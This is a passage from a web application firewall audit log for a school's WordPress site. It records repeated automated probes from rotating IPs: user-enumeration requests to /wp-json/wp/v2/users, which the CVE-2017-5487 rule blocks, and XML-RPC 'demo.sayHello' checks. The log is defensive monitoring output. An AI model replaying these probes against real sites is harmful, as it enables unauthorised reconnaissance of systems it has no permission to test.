"CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656485851866 6324 (- - -) Stopwatch2: 1746656485851866 6324; combined=4615, p1=621, p2=3812, p3=32, p4=34, p5=70, sr=77, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a88383b-Z-- --5a9e9e57-A-- [08/May/2025:05:21:49 +0700] aBvc_cP9GxxPAbCroFbLzgAAAFE 103.236.140.4 39300 103.236.140.4 8181 --5a9e9e57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5a9e9e57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a9e9e57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656509873597 3484 (- - -) Stopwatch2: 1746656509873597 3484; combined=1464, p1=485, p2=947, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a9e9e57-Z-- --c9a42051-A-- [08/May/2025:05:21:55 +0700] aBvdA8P9GxxPAbCroFbLzwAAAFc 103.236.140.4 39304 103.236.140.4 8181 --c9a42051-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.90 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c9a42051-C-- demo.sayHello --c9a42051-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9a42051-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656515329034 4840 (- - -) Stopwatch2: 1746656515329034 4840; combined=3715, p1=441, p2=3057, p3=25, p4=23, p5=97, sr=85, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9a42051-Z-- --2be7381d-A-- [08/May/2025:05:21:55 +0700] aBvdA8P9GxxPAbCroFbL0AAAAEk 103.236.140.4 39306 103.236.140.4 8181 --2be7381d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2be7381d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2be7381d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656515632869 2079 (- - -) Stopwatch2: 1746656515632869 2079; combined=1005, p1=309, p2=670, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2be7381d-Z-- --f9a19478-A-- [08/May/2025:05:22:00 +0700] aBvdCMP9GxxPAbCroFbL0wAAAEI 103.236.140.4 39312 103.236.140.4 8181 --f9a19478-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9a19478-C-- demo.sayHello --f9a19478-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9a19478-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656520877320 4671 (- - -) Stopwatch2: 1746656520877320 4671; combined=3699, p1=414, p2=3096, p3=21, p4=22, p5=86, sr=64, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9a19478-Z-- --f8b67b52-A-- [08/May/2025:05:22:00 +0700] aBvdCMP9GxxPAbCroFbL1AAAAEA 103.236.140.4 39314 103.236.140.4 8181 --f8b67b52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f8b67b52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8b67b52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656520882497 1977 (- - -) Stopwatch2: 1746656520882497 1977; combined=973, p1=336, p2=610, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8b67b52-Z-- --ce01290a-A-- [08/May/2025:05:22:07 +0700] aBvdD8P9GxxPAbCroFbL1gAAAEU 103.236.140.4 39320 103.236.140.4 8181 --ce01290a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ce01290a-C-- demo.sayHello --ce01290a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce01290a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656527149701 5337 (- - -) Stopwatch2: 1746656527149701 5337; combined=3986, p1=479, p2=3292, p3=25, p4=26, p5=95, sr=68, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce01290a-Z-- --a3472c0f-A-- [08/May/2025:05:22:12 +0700] aBvdFMP9GxxPAbCroFbL2AAAAFA 103.236.140.4 39328 103.236.140.4 8181 --a3472c0f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a3472c0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3472c0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656532886926 3272 (- - -) Stopwatch2: 1746656532886926 3272; combined=1406, p1=481, p2=899, p3=0, p4=0, p5=26, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3472c0f-Z-- --fd896641-A-- [08/May/2025:05:22:18 +0700] aBvdGqcs1DvJ_HgMHE_wcwAAAAo 103.236.140.4 39332 103.236.140.4 8181 --fd896641-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fd896641-C-- demo.sayHello --fd896641-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd896641-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656538511812 5202 (- - -) Stopwatch2: 1746656538511812 5202; combined=3955, p1=483, p2=3258, p3=27, p4=43, p5=85, sr=65, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd896641-Z-- --8a70fa30-A-- [08/May/2025:05:22:21 +0700] aBvdHacs1DvJ_HgMHE_wdAAAAAw 103.236.140.4 39336 103.236.140.4 8181 --8a70fa30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8a70fa30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a70fa30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656541830773 1956 (- - -) Stopwatch2: 1746656541830773 1956; combined=962, p1=323, p2=613, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a70fa30-Z-- --b1ab3c7c-A-- [08/May/2025:05:22:28 +0700] aBvdJCs5rYyn3jlLjjK9cwAAAMk 103.236.140.4 39340 103.236.140.4 8181 --b1ab3c7c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1ab3c7c-C-- demo.sayHello --b1ab3c7c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1ab3c7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656548163309 3577 (- - -) Stopwatch2: 1746656548163309 3577; combined=2436, p1=443, p2=1858, p3=15, p4=15, p5=61, sr=66, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1ab3c7c-Z-- --0668632c-A-- [08/May/2025:05:22:51 +0700] aBvdO8P9GxxPAbCroFbL2wAAAE4 103.236.140.4 39344 103.236.140.4 8181 --0668632c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0668632c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0668632c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656571045397 2334 (- - -) Stopwatch2: 1746656571045397 2334; combined=964, p1=330, p2=611, p3=0, p4=0, p5=23, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0668632c-Z-- --6852bf27-A-- [08/May/2025:05:22:57 +0700] aBvdQcP9GxxPAbCroFbL3QAAAEc 103.236.140.4 39348 103.236.140.4 8181 --6852bf27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6852bf27-C-- demo.sayHello --6852bf27-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6852bf27-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656577573456 5303 (- - -) Stopwatch2: 1746656577573456 5303; combined=3921, p1=456, p2=3238, p3=24, p4=26, p5=104, sr=66, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6852bf27-Z-- --687b3914-A-- [08/May/2025:05:22:57 +0700] aBvdQacs1DvJ_HgMHE_wdQAAAA0 103.236.140.4 39350 103.236.140.4 8181 --687b3914-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --687b3914-C-- demo.sayHello --687b3914-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --687b3914-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656577618527 4930 (- - -) Stopwatch2: 1746656577618527 4930; combined=3700, p1=437, p2=3053, p3=22, p4=24, p5=95, sr=73, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --687b3914-Z-- --2946b804-A-- [08/May/2025:05:23:46 +0700] aBvdcqcs1DvJ_HgMHE_wdgAAAAs 103.236.140.4 39358 103.236.140.4 8181 --2946b804-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2946b804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2946b804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656626903429 3300 (- - -) Stopwatch2: 1746656626903429 3300; combined=1412, p1=489, p2=891, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2946b804-Z-- --a032881a-A-- [08/May/2025:05:23:53 +0700] aBvdeacs1DvJ_HgMHE_wdwAAAAg 103.236.140.4 39362 103.236.140.4 8181 --a032881a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a032881a-C-- demo.sayHello --a032881a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a032881a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746656633610541 6070 (- - -) Stopwatch2: 1746656633610541 6070; combined=4367, p1=623, p2=3493, p3=31, p4=34, p5=111, sr=122, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a032881a-Z-- --232cd744-A-- [08/May/2025:05:23:53 +0700] aBvdecP9GxxPAbCroFbL4gAAAFc 103.236.140.4 39364 103.236.140.4 8181 --232cd744-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --232cd744-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --232cd744-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746656633980253 2289 (- - -) Stopwatch2: 1746656633980253 2289; combined=1023, p1=340, p2=651, p3=0, p4=0, p5=31, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --232cd744-Z-- --6b3ef403-A-- [08/May/2025:05:23:59 +0700] aBvdf8P9GxxPAbCroFbL5QAAAEg 103.236.140.4 39370 103.236.140.4 8181 --6b3ef403-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b3ef403-C-- demo.sayHello --6b3ef403-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b3ef403-H-- Message: Warning. Match of "pmFromFile 